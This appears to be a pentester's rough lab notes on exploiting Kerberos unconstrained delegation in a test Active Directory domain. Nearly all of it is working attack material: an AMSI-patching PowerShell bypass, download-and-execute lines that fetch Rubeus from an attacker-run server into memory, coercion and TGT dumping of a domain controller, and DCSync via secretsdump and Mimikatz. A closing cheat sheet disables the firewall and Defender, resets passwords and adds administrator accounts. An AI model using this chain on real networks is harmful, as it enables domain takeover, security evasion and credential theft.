Unconstrain

• To exploit an unconstrained delegation the simplest way is to do that from windows with Rubeus.

• We launch an RDP connection on Bronx.

• We got Fernando.Alonzo password's from the donPAPI dump

• https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#unconstrained-delegation

xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore

From there we will bypass AMSI and launch Rubeus in memory

• Prepare our server containing Rubeus.exe and our AMSI bypass.

python3 -m http.server 8080

• On the RDP session bypass AMSI :

amsi_rmouse.txt contains the below commands

# Patching amsi.dll AmsiScanBuffer by rasta-mouse
$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

Download Rebeus.exe to Parrot OS

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Download the and execute amsi_rmouse.txt to bypass AMSI

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX

• Now launch Rubeus in memory with execute assembly.

• First we will list the available tickets :

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

• And now force a coerce of the DC NYC to the DC Bronx.

Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local

• We look on the triage again :

[Rubeus.Program]::MainString("triage")

• And now the tgt of NYC is present

• To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)

[Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap");

• We now have the TGT of the domain controller

• Let’s continue on linux to pass the ticket and launch dcsync with secretdump :

  • copy the ticket without space and return line (in vim i do : :%s/\s*\n\s*//g)

  • convert the ticket to ccache

  • use the kerberos ticket and launch secretdump

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC

Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on bonx and bypass the defender AV

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

https://github.com/SolomonSklash/RubeusToCcache

rubeus.exe monitor /targetuser:nyc$ /interval:10

https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
SpoolSample.exe nyc bronx
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi

lsadump::dcsync /domain:newyork.local /user:nyc$
[IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64"))
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919


kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi

lsadump::dcsync /domain:newyork.local /user:nyc$
lsadump::lsa /domain:newyork.local /user:nyc$
lsadump::dcsync /user:krbtgt

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation


CMD
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

Set-MpPreference -DisableRealtimeMonitoring $true


#Change User Password via powershell administrator
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)

#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


#Create new user
net user username password /ADD


#To add a new user account to the domain:
net user username password /ADD /DOMAIN


#Add user to Admin Group
net localgroup Administrators Tom /add